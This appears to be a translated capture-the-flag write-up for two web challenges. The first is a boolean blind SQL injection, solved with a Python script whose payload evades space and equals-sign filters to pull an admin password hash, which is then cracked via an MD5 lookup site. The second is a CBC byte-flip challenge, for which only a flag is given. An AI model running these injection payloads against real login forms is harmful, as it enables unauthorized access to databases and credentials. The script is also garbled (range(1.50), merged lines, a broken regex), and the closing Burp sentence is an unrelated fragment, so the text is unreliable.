http://123.206.31.85:49167/ flag format: SKCTF {XXXXXXXXXXXXX} hint: blind SQL injection based on Boolean reference www.zjzhhb.com/archives/28… Fuzz detects a filter space, uses parentheses to bypass it, filters =, and uses <> to bypass it.

Go straight to the script

import requests
import string
import hashlib
import re
url='http://123.206.31.85:49167/'
sss=string.digits+string.lowercase
answer=' '
for i in range(1.50):
    flag=0
    for j in sss:
        postuser="'^(select(ascii(mid((select(password)from(admin))from(%d)))<>%d))^1#"%(i,ord(j))
        data = {'username':postuser,'password':'admin'}
        html = requests.post(url,data=data) .text
        html = re.findall(r"

(.*?)

"
,html,re.S)[0] if 'username does not exist! ' in html : answer+=j flag=1 print answer break if flag ==0 : break print 'password is ',answer Copy the code

Results 51 b7a76d51e70b419f60d3473fb6f900 get password md5 value, md5 decryption www.somd5.com/

Get the admin password: skctf123456 return to http://123.206.31.85:49167/index.php

SKCTF{b1iNd_SQL_iNJEcti0n! }

50, login4

http://123.206.31.85:49168/ flag format: SKCTF {XXXXXXXXXXXXXXXX} hint: CBC byte flip attack

Reference blog.csdn.net/zpy1998zpy/…

www.jianshu.com/p/a61756e54…

Flag

SKCTF{CBC_wEB_cryptography_6646dfgdg6} then click clear on the Positions to clear the password burp thinks should be guessed, then select 12345(the password we just entered, click Add)